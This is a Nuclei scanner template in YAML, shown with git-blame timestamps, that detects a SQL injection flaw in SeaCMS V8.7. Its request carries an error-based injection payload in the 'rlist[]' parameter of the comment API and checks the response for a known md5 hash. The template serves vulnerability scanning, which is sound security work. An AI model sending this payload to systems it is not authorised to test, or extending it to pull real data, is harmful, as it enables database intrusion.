nuclei-templates/vulnerabilities/other/seacms-sqli.yaml

28 lines
597 B
YAML
Raw Normal View History

2022-04-05 13:12:45 +00:00
id: seacms-sqli
2022-04-05 13:12:45 +00:00
info:
2022-04-06 04:48:53 +00:00
name: SeaCMS V8.7 SQL Injection
2022-04-05 13:12:45 +00:00
author: ritikchaddha
2022-04-06 04:48:53 +00:00
severity: high
2022-04-05 13:12:45 +00:00
reference:
- https://www.uedbox.com/post/54561/
2022-04-06 04:48:53 +00:00
tags: seacms,sqli
2022-04-05 13:12:45 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5(202072102)))),@`%27`"
2022-04-06 04:48:53 +00:00
2022-04-05 13:12:45 +00:00
redirects: true
2022-04-06 04:48:53 +00:00
max-redirects: 2
2022-04-05 13:12:45 +00:00
matchers-condition: and
matchers:
2022-04-06 04:48:53 +00:00
- type: word
part: body
words:
- "6f7c6dcbc380aac3bcba1f9fccec991e"
2022-04-05 13:12:45 +00:00
- type: status
status:
- 200